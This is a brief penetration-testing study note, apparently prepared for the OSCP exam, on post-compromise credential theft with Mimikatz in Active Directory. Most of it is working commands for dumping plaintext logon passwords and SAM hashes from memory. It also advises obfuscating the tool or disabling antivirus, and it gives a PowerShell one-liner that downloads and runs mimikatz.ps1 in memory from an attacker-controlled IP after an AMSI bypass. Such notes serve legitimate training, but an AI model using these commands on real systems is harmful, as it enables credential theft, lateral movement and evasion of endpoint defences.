// notes/ Active Directory
🏛️
Post Compromise Attacks Mimikatz
Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable …
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_mimikatz ↗Mimikatz
Overview
Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable or turning off AV is your best bet for using it
Running Mimikatz
Inside of an Administrator shell
powerquery
01mimikatz.exe02privilege::debug - enables all other attacks03sekurlsa::logonPasswords - can show plaintext passwords saved in credmancode
01.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"code
01.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"{% hint style="info" %} The credman passwords appear in clear text because when a network drive is mapped using the Connect using different credentials option, it is cached into credman as clear-text. {% endhint %}
Mimikatz.ps1
Run in memory after amsi bypass
code
01IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')